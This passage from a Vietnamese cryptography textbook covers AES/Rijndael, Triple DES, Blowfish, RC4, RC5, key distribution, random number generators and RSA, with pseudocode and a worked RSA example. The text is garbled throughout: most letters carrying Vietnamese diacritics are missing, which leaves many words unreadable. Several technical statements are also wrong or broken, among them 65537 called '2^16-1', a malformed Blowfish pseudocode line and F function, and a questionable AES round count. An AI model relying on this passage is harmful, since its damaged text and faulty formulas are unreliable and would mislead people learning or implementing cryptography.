IV.3.2 Tiu chun trin khai ca AES Tiu chun ban u: o An ton - chng mi tn cng thm m v thc t o Gi tr v mt tnh ton o Cc c trng ci t v thut ton. Tiu chun cui cng:

    - 56 o An ton tng th o D ci t phn mm v phn cng o Chng c tn cng v mt ci t o Mm do trong m / gii m, kho v cc yu t khc Danh sch cc ng c vin Chun m nng cao c rt gn: o MARS (IBM): phc tp, nhanh, bin tin cy cao o RC6 (USA): n gin, rt nhanh, bin tin cy thp o Rijndael (B): r rng, nhanh, bin tin cy tt o Serpent (Chu u): chm, r rng, bin tin cy rt cao o Twofish (USA): phc tp, rt nhanh, bin tin cy cao Sau tc phn tch v nh gi. Tp trung vo vic so snh cc thut ton khc nhau: o t vng nhng phc tp vi nhiu vng n gin hn. o Nu r ci tin cc m c vi cc xut mi.

    IV.3.3 Chun m nng cao AES Rijndael Cui cng Rijndael c chn l chun m nng cao. N c thit k bi Rijmen Daemen B, c cc c trng sau: C 128/192/256 bit kho v 128 bit khi d liu. Lp hi khc vi Fiestel o Chia d liu thnh 4 nhm 4 byte o Thao tc trn c khi mi vng o Thit k : chng li cc tn cng bit tc nhanh v nn m trn nhiu CPU n gin trong thit k X l khi d liu 128 bit nh 4 nhm ca 4 byte: 128 = 4*4*8 bit. Mi nhm nm trn mt hng. Ma trn 4 hng, 4 ct vi mi phn t l 1 byte coi nh trng thi c x l qua cc vng m ho v gii m. Kho m rng thnh mng gm 44 t 32 bit w[i]. C ty chn 9/11/13 vng, trong mi vng bao gm o Php th byte (dng mt S box cho 1 byte) o Dch hng (hon v byte gia nhm/ct) o Trn ct (s dng nhn ma trn ca cc ct) o Cng kho vng (XOR trng thi d liu vi kho vng). o Mi php ton c thc hin vi XOR v bng tra, nn rt nhanh v hiu qu. S Rijndael

    - 57 -

    Php th Byte o Php th byte n gin o S dng mt bng 16 x 16 byte cha hon v ca tt c 256 gi tr 8 bit o Mi byte trng thi c thay bi byte trn hng xc nh bi 4 bit tri v ct xc nh bi 4 bit phi. Chng hn {95} c thay bi hng 9, ct 5, m gi tr s l {2A}. o S box c xy dng s dng hon v cc gi tr trong GF(28) c xc nh trong chng trc. o Thit k chng mi tn cng bit Dch hng o Dch hng vng quanh trn mi hng Hng 1 khng i Hng 2 dch vng quanh 1 byte sang tri Hng 3 dch vng quanh 2 byte sang tri Hng 4 dch vng quanh 3 byte sang tri o Gii m thc hin dch ngc li sang phi o V trng thi c x l bi ct, bc ny thc cht l hon v byte gia cc ct. Trn cc ct

    - 58 o Mi ct c x l ring bit. o Mi byte c thay bi 1 gi tr ph thuc vo tt c 4 byte trong ct o Nhn ma trn hiu qu trong GF(28), s dng a thc nguyn t m(x) =x8+x4+x3+x+1

    Trn ct o C th biu din mi ct mi l nghim ca 4 phng trnh tm ra byte mi trong mi ct o M yu cu s dng ma trn nghch o Vi h s ln th tnh ton kh khn hn o C cc c trng khc ca ct nh sau: Mi ct l mt a thc bc 3 gm 4 s hng Vi mi phn t l mt byte tng ng vi phn t trong GF(28). Cc a thc nhn tnh theo Modulo (x4+1). Cng kho quay vng o XOR trng thi vi 128 bit kho quay vng o X l li bng ct (hiu qu qua mt lot cc thao tc bit) o Nghch o cho gii m hon ton xc nh, v khi XOR vi nghch o ca bn thn n, XOR trng vi o bit ca kho quay vng. o Thit k n gin nht c th Dng m Vernam vi kho m rng i hi thm mt s bc tng phc tp/tnh an ton. Mt vng AES M rng kho AES o Dng kho 128 bit (16 byte) v m rng thnh mng gm 44/52/60 t 32 bit. o Bt u bng vic copy kho vo 4 t u o Sau to quay vng cc t m ph thuc vo gi tr cc v tr trc v 4 v tr sau 3 trong 4 trng hp ch l XOR chng cng nhau Mi ci th 4 c S box kt hp quay v XOR vi hng s trc , trc khi XOR cng nhau Thit k chng cc tn cng bit

    - 59 -

    Gii m AES o Gii m ngc li khng duy nht v cc bc thc hin theo th t ngc li. o Nhng c th xc nh m ngc tng ng vi cc bc lm i vi m Nhng s dng ngc li vi tng bc Vi kho con khc nhau o Thc hin c v kt qu khng thay i khi i li php th byte v dch cc hng i li vic trn cc ct v b sung kho vng o L do m rng kho: cc tiu chun thit k bao gm Gi s bit mt phn kho, khi khng bit nhiu hn, tc l cc kho con khc hoc kho ni chung. Php bin i nghch o c. Nhanh i vi nhiu kiu CPU. S dng hng s vng lm mt tnh i xng Khuch tn bit kho thnh kho con cho cc vng C tnh phi i xng chng thm m n gin trong vic gii m o Cc kha cnh ci t: c th ci t hiu qu trn CPU 8 bit - Php th byte lm vic trn cc byte s dng bng vi 256 u vo. - Dch hng l php dch byte n gin

    - 60 Cng kho vng lm vic trn byte XOR Cc ct hn hp yu cu nhn ma trn trong GF(28) m lm vic trn gi tr cc byte, c th n gin bng cch tra bng c th ci t hiu qu trn CPU 32 bit - Xc nh li cc bc s dng t 32 bit - C th tnh trc 4 bng vi 256 u vo - Sau mi ct trong mi vng c th tnh bng cch tra 4 bng v 4 XOR - Cn 16 Kb lu cc bng Nhng nh thit k tin tng rng vic ci t rt hiu qu ny l yu t c bn trong vic chn n l m AES Sau y ta xt chi tit hn cc qu trnh m ho, sinh kho v gii m AES. Xt c th qu trnh m ha bao gm 4 bc: 1. AddRoundKey - mi byte ca khi c kt hp vi kha con, cc kha con ny c to ra t qu trnh to kha con Rijndael. -

    Hnh 2.5: M t hot ng bc AddRoundKey 2. SubBytes - y l qu trnh thay th (phi tuyn) trong mi byte s c thay th bng mt byte khc theo bng tra (Tm trong ti liu tng ng).

    Hnh 2.6: M t hot ng bc SubBytes

    - 61 3. ShiftRows - i ch, cc hng trong khi c dch vng.

    Hnh 2.7: M t hot ng bc ShiftRows 4. MixColumns - qu trnh trn lm vic theo cc ct trong khi theo mt chuyn i tuyn tnh.

    Hnh 2.8: M t hot ng bc MixColumns Ti chu trnh cui th bc MixColumns c thay th bng bc AddRoundKey. Thut ton m ho INPUT: M 128 bit, w[Nb*(Nr+1)] --- w l mng kho , M l khi d liu r OUTPUT: Y 128 bit -- Khi d liu c m ho TIN TRNH X L: State:=in; AddRoundKey(State,w[0,Nb-1]); for i in 1..Nr-1 loop SubByte(state); ShiftRows(state); MixColums(state); AddRoundKey(state,w[i*Nb],(i+1)*Nb-1); end loop; SubByte(state); ShiftRows(state); AddRoundKey(state,w[i*Nb],(i+1)*Nb-1); Y:=state; Thut ton sinh kho con s dng ba hm: SubWord(): L mt hm a 4 t u vo qua S-box c 4 t u ra RotWord(): Bin i mt t [a0a1a2a3] thnh mt t [a1a2a3a0] Rcon(i): Cha cc gi tr [xi-1,{00},{00},{00}] vi x={02} v i>=1. Trng hp Nk=8 ( di kho =256) v i-4 l bi s ca Nk th SubWord() c tnh ton vi w[i-1] trc khi XOR Thut ton:

    - 62 INPUT: Kho u vo K, Nk OUTPUT: Mng kho con TIN TRNH X L: Tch kho K thnh Nk khi 4 byte w[i] i=0..Nk-1 i:=Nk; while (i<Nb*(Nr+1)) loop temp:=w[i-1]; if (i mod Nk = 0); temp = SubWord(RotWord(temp)) xor Rcon[i/Nk]; else if (Nk > 6 and i mod Nk = 4); temp = SubWord(temp); end if; w[i] = w[i-Nk] xor temp; i = i + 1; end loop; Thut ton gii m s dng 4 bin i trong c 1 bin i AddRoundKey v 3 bin i o ngc. Bin i InvShiftRows(): tng t bin i ShiftRows thay v dch tri th trong bin i ny l dch phi. Bc InvSubBytes(): Php bin i ny tng t nh SubBytes() thay v dng S-box th s dng InvS-box . Bc InvMixColums(): Tng t nh php MixColums thay v a XOR vi c(x) th l a1 XOR c(x). Thut ton gii m INPUT: M 128 bit, w[Nb*(Nr+1)] --- w l mng kho , M l bn m OUTPUT: Y 128 bit -- Khi d liu c gii m TIN TRNH X L: state = M AddRoundKey(state, w[Nr*Nb, (Nr+1)*Nb-1]) for round = Nr-1 step -1 downto 1 InvShiftRows(state) InvSubBytes(state) AddRoundKey(state, w[round*Nb, (round+1)*Nb-1]) InvMixColumns(state) end for InvShiftRows(state) InvSubBytes(state) AddRoundKey(state, w[0, Nb-1]) Y = state. IV.4 Cc m i xng ng thi IV.4.1 Triple DES M DES nhiu ln R rng DES cn c thay th, v o Cc tn cng v mt l thuyt c th b gy n

    - 63 o Tn cng kho ton din c trnh din AES l m mi thay th Trc n ngi ta s dng lp DES, tc l s dng nhiu ln cng mt thut ton, nhng c th vi kha khc nhau. Triple DES l dng c chn, y lp DES 3 ln. Ti sao li l Triple DES o M khng phi l lp hai ln Double DES: khi lp hai ln khng hon ton l trng vi 1 ln DES no nhng cng c th. o C th dng 2 ln DES trn mt block vi hai kho K1 v K2 : C = EK2(EK1(P)) o Vn l c th rt gn v mt bc khng. o Double DES gp tn cng mc trung gian Gp ni chung khi s dng mt m no 2 ln nh trn V X = EK1[P] = DK2[C] Tn cng bng cch m P vi mi kho v lu li. V gii m C vi cc kho v snh trng nhau tm X. C th ch ra rng cn O(256) bc d tm. Triple DES vi 2 kho o trnh tn cng mc trung gian, cn s dng 3 m, vy ni chung c th dng 3 kho khc nhau. o Nhng n gin hn c th s dng 2 kho theo trnh t:ED-E, tc l m, gii m, ri li m. C = EK1[DK2[EK1[P]]] V mt an ton m v gii m tng ng nhau Nu K1 = K2 th tng ng lm vic vi mt ln DES Chun ho trong ANSI X9.17 & ISO8732 Cha thy tn cng thc t. Triple DES vi 3 kho o Mc d cha c tn cng thc t, nhng Triple DES vi 2 kho c mt s ch nh trnh ri vo mt s trng hp c bit. o Cn phi s dng 3 ln DES vi 3 kho trnh iu C = EK3[DK2[EK1[P]]] o c chp nhn bi mt s ng dng trn Internet: PGP, S/MIME

    IV.4.2 Blowfish M i xng c thit k bi Shneier khong 1993-1994. M c cc c trng sau: o Ci t nhanh trn CPU 32 bit o Dng t b nh. o Cu trc n gin, d ci t v phn tch. o an ton thay i theo di ca kho c ci t trn nhiu sn phm khc nhau Lc kho con ca Blowfish o Dng kho c di bit linh hot t 32 n 448. o S dng kho sinh

    - 64 18 kho con 32 bit lu tr trong mng K: KJ Bn S box c 8 x 32 lu trong Si, j o Lc kho gm Khi to P mng v sau l 4 hp S box XOR P mng vi bit kho (s dng li nu cn) Lp li vic m d liu s dng P & S hin thi v thay cp thnh cng P sau S. i hi 512 kho, nn chm khi ly kho con mi o M Blowfish S dng 2 php c bn cng v XOR D liu c chia thnh 2 na mi na 32 bit L0 & R0 for i = 1 to 16 do Ri = Li-1 XOR Pi; Li = F[Ri] XOR Ri-1; L17 = R16 XOR P18; R17 = L16 XOR i17; trong F[a,b,c,d] = ((S1,a + S2,b) XOR S3,c) + S4,a o Bn lun: Kho con v S box ph thuc vo kho sinh ra, s dng vo chnh m nn vic phn tch rt kh Thay i hai na sau mi vng lm tng an ton Kho c cp ln vic tm duyt kho l khng thc t, c bit khi tp trung vo lc to kho con. IV.4.3 RC4 RC4 l m ng k bn quyn ca RSADSI, c thit k bi Ronald Rivest. RC4 n gin, nhng hiu qu, c nhiu c kho v l m bit dng. M c s dng rng ri (Web SSL/TLS, khng dy WEP). Kho thc hin hon v ngu nhin c 8 gi tr bit. S dng hon v khuy thng tin u vo c x l tng byte. Sinh kho RC4 o Bt u t mng S vi bin : 0..255 o S dng kho xo trn u thc s. o S to trng thi trong ca m. M RC4 o M tip tc trn cc gi tr ca mng. o Tng ca cc cp trn chn gi tr kho dng t hon v o XOR S[t] vi byte tip theo ca bn tin m/gii m i=j=0 for each message byte Mi i = (i + 1) (mod 256) j = (j + S[i]) (mod 256) swap(S[i], S[j]) t = (S[i] + S[j]) (mod 256) Ci = Mi XOR S[t]

    - 65 Tng quan RC4

    An ton RC4 o m bo an ton chng cc tn cng o C mt s thm m, nhng khng thc t o Kt qu rt phi tuyn o V RC4 l m dng nn khng c s dng li kho. o C lin quan n WEP, nhng ty thuc qun l kho hn l bn thn RC4. IV.4.4 RC5 RC5 cng l m ng k bn quyn ca RSADSI, c thit k bi Ronald Rivest v c s dng trong nhiu sn phm ca RSADSI. RC5 c nhiu c kho v d liu khc nhau v c bit khng c vng lp. Thit k rt n gin v r rng. RC5 c ci t d dng trn nhiu CPU v cn c nh gi l an ton. Cc m RC5 o RC5 l mt h cc m vi bat ham s RC5-w/r/b w l kch thc ca t (16/32/64), s bit data = 2w r l s vng (0..255) b l s byte ca kho (0..255) o Phin bn chun l RC5-32/12/16 Tc l 32 bit word, m khi 64 bit d liu S dng 12 vng Vi 16 byte (128 bit) kho

    - 66 o M rng kho RC5 RC5 s dng 2r + 2 t kho con (w-bit) Cc kho con lu trong mng R[i], i = 0,1,.., t-1 Sau lc sinh kho gm - Khi to S l gi tr gi ngu nhin c nh, da trn hng s e v phi. - Kho byte c sao vo mng c-word L - Php trn s kt hp L v S thnh mng S cui cng M RC5 o Tch u vo thnh 2 na A v B L0 = A + S[0]; R0 = B + S[1]; for i = 1 to r do Li = ((Li-1 XOR Ri-1) <<< Ri-1) + S[2 x i]; Ri = ((Ri-1 XOR Li) <<< Li) + S[2 x i + 1]; o Mi vng ging nh 1 vng 2 DES o Quay l ngun phi tuyn chnh o Cn s vng chp nhn c (12-16) Cc ch m RC5 o RFC2040 xc nh 4 ch ca RC5 M khi RC5, tc l ch ECB RC5-CBC RC5-CBC-PAD l ch vi b m bng cc byte c gi tr bng s byte m. RC5-CTS, mt kiu ca CBC, cng kch thc vi bn tin gc.

    IV.4.5 Cc c trng ca m khi v m dng. 1. Cc c trng m khi. Cc c trng trong m khi hin i l o di kho / kch thc khi / s vng c th thay i o Cc php ton trn, quay ph thuc kho hoc d liu. o S box ph thuc kho o To kho con phc tp hn o Php ton vi y d liu mi vng. o Bin thin hm phi tuyn. 2. Cc c trng m dng. o X l mu tin ln lt theo tng bit. o Thng thng c kho dng (gi) ngu nhin. o Kt hp XOR vi bn r theo tng bit o Ngu nhin vi kho dng s xo b hon ton cc phn tch thng k ca mu tin Ci = Mi XOR StreamKeyi o Rt n gin o Nhng kho khng c s dng li 3. Cc tnh cht ca m dng trong khi thit k a. S dng lu khng b lp

    - 67 b. c. d. e. f. g. Ngu nhin thng k Ph thuc kho ln phc tp tuyn tnh ln Ri lon Khuch tn S dng hm Boole phi tuyn bc cao

    IV.5 Bo mt dng kho i xng IV.5.1 Yu cu M i xng truyn thng c dng gi b mt bn tin Xt kch bn tiu biu o Cc my trm mt mng LAN truy cp vo cc my trm v my ch mt mng LAN khc o Cc mng c kt ni s dng chuyn mch v ng truyn (switches/routers) o Vi cc ng truyn vt l hoc lin kt v tuyn/v tinh Xt vic tn cng v cch t m trong kch bn trn o iu tra t mt my trm khc o S dng kt ni n mng hoc my ch tm kim o S dng kt ni ngoi xm nhp v iu tra o Theo di v/hoc lm thay i vic truyn kt ni ngoi. C hai phng php chnh xc nh ch t m M kt ni (Link Encription) o M xy ra c lp trn mi kt ni. o Suy ra cn phi gii m truyn tin gia cc kt ni o i hi nhiu thit b v cc cp kho M u cui (End to end Encription) AES l m mi thay th o M xy ra gia im gc v im ch o Cn thit b ti mi u cui v kho chia s IV.5.2 Thm m thng tin truyn Khi dng m u cui cn phi thng tin u ca n r rng, v nh vy mng mi nh hng ng n thng tin. V vy tuy ni dung tin c bo v, nhng khun dng tin truyn th khng. Tt nht l mun b mt c hai. M u cui bo v thng tin ni dung trn c ng truyn v cung cp danh tnh. Cn m kt ni bo v lung truyn khi vic theo di. V tr m C th t m nhiu tng khc nhau trong m hnh H thng truyn thng m OSI o M kt ni thc hin tng 1 hoc 2. o M u cui c th thc hin tng 3, 4, 6, 7 o Dch chuyn n tng cng cao, cng t thng tin c m ho, nhng cng an ton hn do ngi s dng gi b mt uc kho, tuy nhin phc tp hn vi nhiu i tng v kho hn. Thm m thng tin truyn Thm m l theo di dng thng tin truyn gia hai i tc: o c dng c trong qun s v thng mi

    - 68 o C th c dng to knh gim st o M kt ni che lp chi tit u tin, nhng xt trn ton mng v cc u cui n vn nhn thy c B m truyn c th che c dng tin, nhng vi phi truyn lin tc vi tn sut truyn hu nh khng i theo thi gian. IV.5.3 Phn phi kho S i xng i hi c hai i tc chia s kho b mt chung. Vn t ra l lm sao phn phi kho mt ny nh th no. Thng thng cc h mt thng b sp v b b kho trong s phn phi kho. i vi hai i tc A v B cho trc c mt s cch phn phi kho khc nhau: 2. A la chn kho v truyn tay cho B 3. i tc th ba c th chn kho v phn phi cho A v B 4. A v B trao i trc c th dng kho trc m kho mi 5. A v B trao i mt vi i tc th 3 l C, C chuyn tip gia A v B

    Kch bn phn phi kho Phn loi kho Thng thng kho phn loi nh sau: Kho phin (section key): o Kho tm thi. o Dng m ho d liu gia nhm ngi s dng. o Cho mt phin logic v sau b i. Kho chnh (master key): o Dng m cc kho phin. o Chia s gia ngi s dng v trung tm phn phi kho. Vn phn phi kho i vi mng ln i hi phn cp Trung tm phn phi kho KDC, nhng cn phi to tin cy cho nhau, gia ngi s dng vi Trung tm v cc Trung tm vi nhau. Thi

    - 69 gian sng ca kho b phn cn c hn ch cho an ton hn. S dng phn phi kho t ng thay mt ngi dng, nhng phi c h thng tin cy, cc kho cp pht c sinh ra cng ngu nhin cng tt. Cn phi c h thng phn phi kho phn tn v phn cp. ng thi cn h tr kim sot mc ch s dng kho. IV.5.4. Cc s ngu nhin C nhiu ng dng ca s ngu nhin trong l thuyt m. Chng hn, kho xc thc dng trong cc th tc xc thc chng tr hon hoc kho phin, kho dng cho b m mt ln. Do cn c c ch sinh kho cng khai Trong nhiu trng hp c bit cc gi tr ny cn phi o Ngu nhin v mt thng k, c phn phi u, c lp. o Khng on trc c cc gi tr tip theo nu da vo cc gi tr trc . Sinh s ngu nhin t nhin: Ngun cung cp tt nht l ngu nhin t nhin trong th gii thc. Thng ngi ta tm mt s kin g thng gp nhng ngu nhin. Ni chung cn phi bng cch no thc hin c, chng hn: sng radio, m radio, nhit trong diot,Bt u quan st ci g xy ra trong CPU mi. Ta gp vn thin lch v phn b khng u ca cc tn hiu, do phi iu chnh: o Cn phi b p li khi to mu v s dng. o Tt nht ch s dng mt s bit n nht trong mi mu. Ngun s ngu nhin ng C mt s t su tm v s ngu nhin ng. Rand Co trong nm 1955 in hn 1 triu s ngu nhin. c sinh bng cch s dng bnh quay s in t. c s dng trong thit k mt s m nh Khafre. Trc 1927, Tippet in mt b su tp cc s ngu nhin. Vn l ch: o S lng hn ch cc s ngu nhin o c bit v s dng trong nhiu ng dng B sinh s gi ngu nhin (PRNG) Dng k thut thut ton xc nh to s ngu nhin. Mc d khng ngu nhin tht, nhng phi nhiu php th kim tra m bo tnh ngu nhin. Cc s nh vt c bit n nh nhng s gi ngu nhin. C cc b sinh s gi ngu nhin PRNG. B sinh ng dng tuyn tnh Mong mun sinh mt dy s ngu nhin. Ly ba s a, c, m v mt s u tin ca dy. K thut lp chung c s dng l to s tip theo da vo s trc : Xn+1 = (aXn + c) mod m Cho trc cc s v tham s ph hp c th sinh ra dy s ta ngu nhin kh di. Tiu chun ph hp cn c l o Hm sinh ra gi tr lp y chu k o Dy sinh ra phi ngu nhin o Ci t hiu qu vi s hc 32 bit o Lu rng k thm m phi khi phc li dy nu cho trc mt s t cc gi tr

    - 70 S dng m khi nh b sinh s gi ngu nhin C th s dng m khi sinh s gi ngu nhin. S dng ch m Xi = EKm[i] S dng ch u ra phn hi Xi = EKm[Xi-1] Trong ANSI X9.17 PRNG: s dng thi gian, ngy thng v mt s thng tin mi v m 3 DES sinh mi mi v s ngu nhin. B sinh Blum Blum Shub Da vo thut ton m kho cng khai. S dng bit t quan trng nht t ng thc sau: xi+1 = xi2 mod n trong n=p.q, v cc s nguyn t p, q=3 mod 4. y m bo tnh cht: khng on trc c bit tip theo. Tnh an ton da trn kh ca bi ton phn tch N ra tha s. Khng on trc c nu cho chy truc mt s ln cc bt. Tuy nhin chm, v phi dng cc s rt ln. c bit rt chm cho vic m ho, nn ch dng cho vic sinh kho. Bi tp 1. Vit hai dy s sinh bi cc phng trnh sau: Xn+1 = (6Xn ) mod 13 Xn+1 = (7Xn ) mod 13 Chng t c hai dy trn u c chu k y . Dy no t ra c v ngu nhin hn. 2. Hy vit cc dy s theo phng trnh sau : xi+1 = xi2 mod 21 v xi+1 = xi2 mod 33 C nhn xt g v tnh ngu nhin ca chng. 3. Lp s khi m ho DES. Nu cc c trng ca DES. 4. Lp s khi m ho AES. Nu cc c trng ca AES. 5. M t s dng bn th ba phn phi kho mt gia hai ngi s dng. Nu cc u nhc im ca s . 6. C th dng kho mt to nn ch k in t c khng, ngha l c mt du hiu g m ch c ngi gi thc hin c gn vi ni dung ca bn tin. Ngi nhn c c bn tin v c th kim tra tin tng rng ngi gi vit ni dung bn tin . 7. M t cc c trng m khi, chun m DES, chun m nng cao AES.

    - 71 CHNG 5: M CNG KHAI V QUN L KHO V.1 M kho cng khai M kho ring M kho ring cn c gi l m kho n hay mt. y ch dng mt kho, dng chung c ngi nhn v ngi gi. Khi kho ny c dng, vic trao i thng tin v kho s c tha thun trc. Ngi ta cn gi y l m i xng, v hai i tc c vai tr nh nhau. Do khng bo v ngi gi khi vic ngi nhn gi mo mu tin v tuyn b l n c gi bng ngi gi. Ngha l khi hai ngi dng m i xng, th h gi c b mt ni dung trao i, nhng bn thn mu tin khng mang thng tin xc thc c ngi gi.

    V.1.1 M kho cng khai Kho cng khai ra i vo u nhng nm 1970. C th ni y l bc tin quan trng nht trong lch s 3000 nm m ho. y ngi ta s dng 2 kho: mt kho ring v mt kho cng khai. Hai kho ny khc nhau, khng i xng vi nhau, do m kho cng khai, cn c gi l m khng i xng. Ngi ta ng dng mt cch thng minh cc kt qu ca l thuyt s v hm s. Kho cng khai ra i h tr thm gii quyt mt s bi ton an ton, ch khng phi thay th kho ring. C hai kho cng tn ti, pht trin v b sung cho nhau. Kho cng khai/hai kho/khng i xng bao gm vic s dng 2 kho: o Kho cng khai, m mi ngi u bit, c dng m ho mu tin v kim chng ch k. o Kho ring, ch ngi nhn bit, gii m bn tin hoc to ch k. o L khng i xng v nhng ngi m ho v kim chng ch k khng th gii m hoc to ch k.

    - 72 -

    S m kho cng khai V.1.2 Ti sao li phi dng m kho cng khai Ngi ta mun gii quyt hai vn sau v kho ny sinh trong thc t: o Phn phi kho - lm sao c th phn phi kha an ton m khng cn trung tm phn phi kho tin cy o Ch k in t - lm sao c th kim chng c rng mu tin gi n nguyn vn t ng ngi ng tn gi. Nu ch dng kho i xng, th khng c gii php cho hai bi ton trn. M kho cng khai c pht minh trc cng chng bi hai nh bc hc Whitfield Diffie & Martin Hellman trng i hc Stanford vo nm 1976. Tuy nhin khi nim ban u v n c bit n sm hn bi cng ng cc nh khoa hc. V.1. 3 Cc c trng ca kho cng khai Cc thut ton kho cng khai dng 2 kho vi cc c trng sau: o Khng c kh nng tnh ton tm kho gii m nu ch bit thut ton m v kho dng m. o C th d dng m ho hoc gii m mu tin nu bit kho tng ng o Trong mt s s : mt kho bt k trong hai kho c th dng m, cn kho kia dng gii m. Chng c vai tr i ngc nhau.

    - 73 V.1.4 ng dng kho cng khai C th phn loi cc ng dng ca kho cng khai thnh 3 loi khc nhau: o M/gii m cung cp bo mt. y l ng dng bo mt truyn thng ging nh ta vn thng dng vi kho i xng. o Ch k in t - cung cp xc thc. Mt trong cc ng dng mi ca kho cng khai m kho i xng khng th thc hin c, l kho cng khai c c s xc nhn ngi gi v c th l mt la chn to ch k in t ca ngi gi. Mt s thut ton m cng khai ph hp vi mi ng dng, cn mt s khc chuyn dng cho ng dng c th. V.1.5 Tnh an ton ca cc s kho cng khai Cng ging nh kho ring vic tm kim vt cn lun lun c th, tc l khi bit mt trong hai kho v thut ton m ho v nguyn tc ta c th d tm kho th hai bng cch tnh ton cc gi tr lin quan. Ni chung khi lng cn tnh ton l rt ln do phc tp ca bi ton xc nh kho. Nu kho s dng l rt ln c hn 512 bit, th hu nh bi ton tm kho th hai l khng kh thi, khng th thc hin c trong thi gian c ngha, cho d ngun lc c th rt ln. Tnh an ton da trn s khc bit ln gia cc bi ton d l m/gii m khi bit kho v bi ton kh l thm m khi khng bit kho tng ng. V bi ton thm m nm trong lp cc bi ton kh tng qut hn c bit n v v mt l thuyt c chng minh l n rt kh c th thc hin trn thc t. Bi v n i hi s dng s rt ln, nn s php ton cn thc hin l rt nhiu. y l tng chnh to nn mt m cng khai. Ta tm kim cc bi ton m nu bit thng tin mt no c che du th n rt d thc hin, cn nu khng th n thuc lp bi ton rt kh gii, hu nh khng th gii trn thc t. M cng khai thng chm hn kh nhiu so vi m i xng, nn n thng c dng m nhng thng tin nh quan trng. V.2 RSA RSA l m cng khai c sng to bi Rivest, Shamir & Adleman MIT (Trng i hc Cng ngh Massachusetts) vo nm 1977. RSA l m cng khai c bit n nhiu nht v s dng rng ri nht hin nay. N da trn cc php ton ly tha trong trng hu hn cc s nguyn theo modulo nguyn t. C th, m ho hay gii m l cc php ton lu tha theo modulo s rt ln. Vic thm m, tc l tm kho ring khi bit kho cng khai, da trn bi ton kh l phn tch mt s rt ln ra tha s nguyn t. Nu khng c thng tin g, th ta phi ln lt kim tra tnh chia ht ca s cho tt c cc s nguyn t nh hn cn ca n. y l vic lm khng kh thi. Ngi ta chng minh c rng, php ly tha cn O((log n)3) php ton, nn c th coi ly tha l bi ton d. Cn ch rng y ta s dng cc s rt ln khong 1024 bit, tc l c 10350. Tnh an ton da vo kh ca bi ton phn tch ra tha s cc s ln. Bi ton phn tch ra tha s yu cu O(e log n log log n) php ton, y l bi ton kh. V.2.1 Khi to kho RSA Mi ngi s dng to mt cp kho cng khai ring nh sau:

    - 74 Chn ngu nhin 2 s nguyn t ln p v q Tnh s lm modulo ca h thng: N = p.q o Ta bit N)=(p-1)(q-1) o V c th dng nh l Trung Hoa gim bt tnh ton Chn ngu nhin kho m e o Trong 1<e< N), gcd(e,(N))=1 Gii phng trnh sau tm kho gii m d sao cho o e.d=1 mod (N) vi 0d (N) In kho m cng khai KU={e,N} Gi kho ring b mt KR={d,p,q}

    V.2.2 S dng RSA m ho mu tin, ngi gi: o ly kho cng khai ca ngi nhn KU={e,N} o Tnh C=Me mod N, trong 0M<N gii m ho bn m, ngi s hu nhn: o S dng kha ring KR={d,p,q} o Tnh M=Cd mod N Lu rng bn tin M < N, do khi cn chia khi bn r. C s ca RSA Theo nh l Ole o a(n)mod N = 1 trong gcd(a,N)=1 o Ta c N=p.q o (N)=(p-1)(q-1) o e.d=1 mod (N) o e.d=1+k.(N) i vi mt gi tr k no . Suy ra o Cd = (Me)d = M1+k.(N) = M1.(M(N))k Cd modN = M1.(1)k modN = M1 modN = M modN V d 1. Chn cc s nguyn t: p=17 & q=11. 2. Tnh n = pq, n = 1711=187 3. Tnh (n)=(p1)(q-1)=1610=160 4. Chn e : gcd(e,160)=1; Ly e=7 5. Xc nh d: de=1 mod 160 v d < 160 Gi tr cn tm l d=23, v 237=161= 10160+1 6. In kho cng khai KU={7,187} 7. Gi kho ring b mt KR={23,17,11} V d p dng m RSA trn nh sau: Cho mu tin M = 88 (vy 88<187) M C = 887 mod 187 = 11

    suy

    ra

    - 75 Gii m M = 1123 mod 187 = 88 C th dng nh l phn d Trung Hoa gii m cho nhanh nh sau: a. Tnh 1123 mod 11 = 0 b. Tnh 1123mod 17 = (-6)23 mod 17 = (-6)16(-6)4 (-6)2 (-6) mod 17 = 3 V (-6)2 mod 17 = 2, nn (-6)4 mod 17 = 4, (-6)8 mod 17 = -1 (-6)16 mod 17 = 1 -1 c. 11 mod 17 = (-6)-1 mod 17 = 14 nn c2 = 11(11-1 mod 17) = 11 (14 mod 17) = 154 d. Vy M = (3.154) mod 187 = 462 mod 187 = 88 V.2.3 Ly tha Trong cc bi ton m ho cng khai, chng ta s dng nhiu php ton ly tha vi s m ln. Nh vy cn c thut ton nhanh hiu qu i vi php ton ny. Trc ht ta phn tch s m theo c s 2, xt biu din nh phn ca s m, sau s dng thut ton bnh phng v nhn. Khi nim c da trn php lp c s bnh phng v nhn nhn c kt qu mong mun. phc tp ca thut ton l O(log2 n) php nhn i vi s m n. V d: 75 = 74.71 = 3.7 = 10 mod 11 v 72 = 7.7 = 49 = 5 mod 11 74 = 72.72 = 5.5 = 3 mod 11

    3129 = 3128.31 = 5.3 = 4 mod 11 Phn tch s m theo c s 2 Trc ht ta chuyn s m t c s 10 sang c s 2: (11)10 = (1011)2. Sau tnh ton nh sau:

    M11 = M1.2^3 + 0.2^2+ 1.2^1 + 1.2^0 = (M1.2^2 + 0.2^1+ 1.2^0 )2M = (M1.2^1 + 0.2^0)2M)2M = ((M2)2 M)2M

    Thut ton ly tha Gi s b1b2bk l biu din c s 2 ca c. Tnh ac mod n

    - 76 Trong thut ton trn gi tr ca c ch dng kim tra s m ca ly tha. Cn d chnh l gi tr ly tha cn tnh v a l c s ca lu tha. V.2.4 M hiu qu: M s dng ly tha ca kho cng khai e, nu gi tr ca e nh th tnh ton s nhanh, nhng d b tn cng. Thng chn e nh hn hoc bng 65537 (216-1), tc l di kho cng khai l 16 bit. Chng hn trong v d trn ta c th la chn e = 23 hoc e = 7. Ta c th tnh m ho nhanh, nu bit n=pq v s dng nh l phn d Trung Hoa vi mu tin M theo cc Modulo p v q khc nhau. Nu kho cng khai e c nh th cn tin tng rng khi chn n ta lun c gcd(e,(n)) = 1. Loi b mi p, q m lm cho (n) khng nguyn t cng nhau vi e. V.2.5 Gii m hiu qu: C th s dng nh l phn d Trung Hoa tnh theo mod p v q, sau kt hp li tm ra bn r. V y ngi s dng kho ring bit c p v q, do c th s dng k thut ny. Nu s dng nh l phn d Trung Hoa gii m th hiu qu l nhanh gp 4 ln so vi gii m tnh trc tip. V.2.6 Sinh kho RSA Ngi s dng RSA cn phi xc nh ngu nhin 2 s nguyn t rt ln, thng thng khong 512 bit. Do vic sinh ra ngu nhin p, q v kim tra xc sut tnh nguyn t ca chng c nhiu gii php khc nhau vi tin cy cao. Sau khi chn c mt kho e hoc 